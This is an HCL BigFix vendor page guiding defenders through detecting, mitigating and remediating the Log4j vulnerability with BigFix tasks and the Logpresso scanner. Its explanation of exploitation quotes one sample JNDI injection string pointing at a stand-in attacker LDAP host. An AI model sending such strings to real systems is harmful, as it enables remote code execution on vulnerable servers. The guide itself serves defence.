- Enterprise Security
- HCL BigFix
-
Offerings
-
Workspace+Managing and securing the hybrid workspace with a comprehensive solution that seamlessly manages all devices across any location while focusing on user experience and controlling cyber risk.
-
Enterprise+Intelligent hybrid infrastructure automation offering intelligent runbook automation, leveraging cybersecurity, and analytics capabilities to proactively identify and remediate vulnerabilities in real-time.
-
- Industries
-
Use Cases
-
Solutions
-
Zero Trust Endpoint ManagementAccelerate your Zero Trust pursuit with BigFix Zero Trust Endpoint Management.
-
Remediate Vulnerabilities FastEssential capabilities to remediate vulnerabilities faster than ever, helping organizations reduce cybersecurity risk.
-
Mitigating the Log4j VulnerabilityLearn how to use HCL BigFix to detect and mitigate the Log4j vulnerability across your enterprise.
-
Continuous ComplianceEnhance security posture and automate the fight against cyberattacks.
-
Software Asset ManagementMaintain software audit readiness, mitigate non-compliance risk, and optimize software spend.
-
Manage IoT DevicesEfficiently patch, deploy software, inventory, report, and remediate IoT devices from one single platform.
-
Manage MulticloudExtend your capabilities by integrating with other enterprise solutions.
-
Enable Work from HomeEnroll, deploy, secure, and support endpoints in today’s work from home environment.
-
Slash Costs with BigFixSave Money and Reduce Complexities with BigFix.
-
Manage KiosksKiosk security, management, and compliance.
-
An Optimization Model for IT OperationsA roadmap to a greater efficiency, better security, and lower costs.
-
- Events
- Resources
- Partners
-
Attachments
-
BigFix for SCCM
-
BigFix Events & Webinars
-
BigFix ComplianceContinuously monitor and enforce endpoint...
-
BigFix InventoryIdentify licensed and unlicensed software across your organization.
-
BigFix LifecycleReduce cost, risk, and complexity of endpoint and server management.
-
BigFix InsightsAccelerate risk identification and decision-making.
-
BigFix MobileExtends modern endpoint management techniques to mobile devices running iOS, iPadOS and Android
-
BigFix Summer Launch
-
Endpoint Security Optimization Model
-
IVR Home
-
Bigfix Upcoming Past Events
-
BigFix TrainingA digital workplace with everything employees need.
-
Customer Reference
-
Customer Video
-
BigFix Partners
-
Demo
-
Professional Services
-
Google Cloud
-
AWS
-
Azure
-
Intel EMA
-
Aruba Clear Pass
-
Continuous ComplianceEnhance security posture and automate the fight against cyberattacks.
-
BigFix Work from HomeEnroll, deploy, secure and support endpoints in today’s work-from-home environment.
-
InventoryMaintain software audit readiness, mitigate security and non-compliance risks, and better understand software usage.
-
BigFix Days
-
BigFix Days Americas
-
BigFix Days APAC
-
BigFix Days EMEA
-
BigFix Product FamilyThe BigFix product family guide provides an overview of the extensive capabilities...
-
Work From Home
-
Upcoming events & webinarsLearn more and sign up for upcoming BigFix events or watch exclusive past recorded BigFix webinars.
-
Past events & webinars
-
Tool Consolidation
-
Simplify Endpoint Management through Tool ConsolidationSignificantly reduce IT costs while also reducing IT complexity, streamlining operations, and esuring business continuity.
-
Compliance Solution Guide
-
Service Now
-
Service Now Data Flow
-
Service Graph
-
Forescout
-
Resilient
-
Qradar
-
VMWare ESXi
-
BigFix Trust Center
-
BigFix Contact Us
-
ESG-BigFix-IVR
-
qualys
-
Tenable
-
BigFix IoT
-
BigFix Experts
-
BigFix Upgrade from Patch
-
BigFix Field guide
-
BigFix Days Japan
-
Log4j -vulnerabilities
-
Log4j Guide
HCL BigFix Guide
for Countering the Log4J Vulnerability
Nearly every global enterprise or organization is facing pressure to fix what experts are calling one of the most serious software vulnerabilities in recent memory. It’s ubiquitous and easy to exploit.
The flaw in the Log4j software could allow hackers unfettered access to computer systems and has prompted an urgent warning by the U.S. government’s cybersecurity agency.
Attacks have already taken place less than a day after its reporting. Currently, this vulnerability holds a risk matrix base score of 10 and has been labelled by GitHub advisory as a critical severity level.
What is it?
It is a vulnerability discovered in Apache Log4j, the popular Java library developed and maintained by the Apache foundation. The Log4j library is widely used in many commercial and open-source software products as a Java logging routine. The criticality of the vulnerability has a score of 10/10 in the MITRE.org common vulnerability scoring system (CVSS) indicating the severity.
How is it exploited?
The Log4j can be exploited remotely by an unauthenticated adversary using remote code execution (RCE). If an attacker sends a message that contains a string like ${jndi:ldap://dirtyLDAP.com/X}), an external code class or message lookup may result in the execution of malicious code WITHOUT authentication.
Who is impacted?
Hundreds of millions of devices are at risk including those in government, commercial and home computers. In addition, each affected device may have dozens or hundreds of places where the vulnerable code resides, as logging is an extremely common action in all of computing.
How can HCL BigFix help?
The HCL BigFix team is working alongside our customers, security experts, and IT Operations to produce HCL BigFix content to help you identify and fix the Log4j vulnerabilities in your environment.
HCL BigFix is the essential tool for IT Operations. HCL BigFix automates discovery, management, and remediation of all endpoints whether on-premises, mobile, virtual, or in the cloud – regardless of the operating system, location, or connectivity. With HCL BigFix Insights for Vulnerability Remediation, which integrates with leading vulnerability management solutions like Tenable, vulnerabilities like Log4j can be remediated faster than any other solution in the market.
With HCL BigFix you can discovery, mitigate, remediate vulnerabilities, create pre- and post- remediation reports, and protect remediated endpoints.
DISCOVERY
HCL BigFix has developed tasks to help HCL BigFix users discover Log4J instances and vulnerabilities. We used the Logpresso Log4j scanner because it is an open-source Java-based scanner available on GitHub, developed by the Logpresso technical team, and is freely available to the cybersecurity community.
These tasks download a temporary Java runtime to execute the scan, and do not require Java to be installed on the system. These tasks work on Windows 8.1 and higher (x86 and x64), Mac OS X, Linux (x86, x64, armv71, ppc64, ppc64LE, and s390x), AIX 7.1 TL4 and higher, and Solaris (x86 and SPARC). With a manual download of the JRE, the tasks can also execute on HP-UX.
The following four steps articulates the general process for discovering and reporting on the vulnerability:
1. From the "BES Inventory and License" Content Site, execute Task 602 "Run: log4j2-scan v2.9.2 – Universal JAR – Download JRE – SCAN only".
2. From the "BES Inventory and License" Content Site, activate Analysis 601 "log4j2-scan results".
3. After scan results have been uploaded to the HCL BigFix Server, view detailed scan results in the Analysis. See the image below.
4. For Executive Reporting, use the "Log4j Vulnerability Report (Logpresso Scan)" view provided in HCL BigFix Web Reports.
MITIGATE
Prior to patches being made available from the application vendors, there are two ways to mitigate the Log4J risk:
1. Use the Logpresso Log4j-scan utility to remove vulnerable Java classes from the affected Log4j-core JAR files. The HCL BigFix task to do this is available from the "BES Inventory and License" Content Site. It is called Task 603 (Run: log4j2-scan v2.9.2 – Universal JAR – Download JRE – WITH REMEDIATION).
The Logpresso Log4j-scan utility can perform some remediations on affected Log4j-Core JAR libraries, for both Log4j 2.x and Log4j 1.x. The utility mitigates the worst of the CVEs but may not mitigate all denial-of-service based vulnerabilities. Nonetheless, the utility this can be a very effective step at providing protection while maintaining backward-compatibility with existing applications. For details of the specific mitigations that can be performed by the tool, visit https://github.com/logpresso/CVE-2021-44228-Scanner.
2. Stop or disable the affected applications or services.
REMEDIATE
As vendors make patches available, HCL BigFix will quickly create, test and deliver HCL BigFix fixlets. Download the latest list of HCL BigFix fixlets that remediate Log4J vulnerabilities from https://www.hcltechsw.com/bigfix/log4j-ivr.
REPORT
With BigFix, reports of the affected systems and libraries can be viewed and archived using HCL BigFix Web Reports that show vulnerability and mitigation status across different points in time.
PROTECT
Once the vulnerability has been remediated, HCL BigFix can ensure it doesn’t reappear. With BigFix, you can schedule recurring scans using the available Detection Task so any new systems or software with the Log4J vulnerability can be identified and remediated.
If you need more assistance, search the HCL BigFix forum, contact HCL BigFix Professional Services or contact Technical Support.
Try HCL BigFix Today!
One endpoint management platform enabling IT Operations and Security teams to automate discovery, management and remediation – whether its on-premise, virtual, or cloud – regardless of operating system, location or connectivity.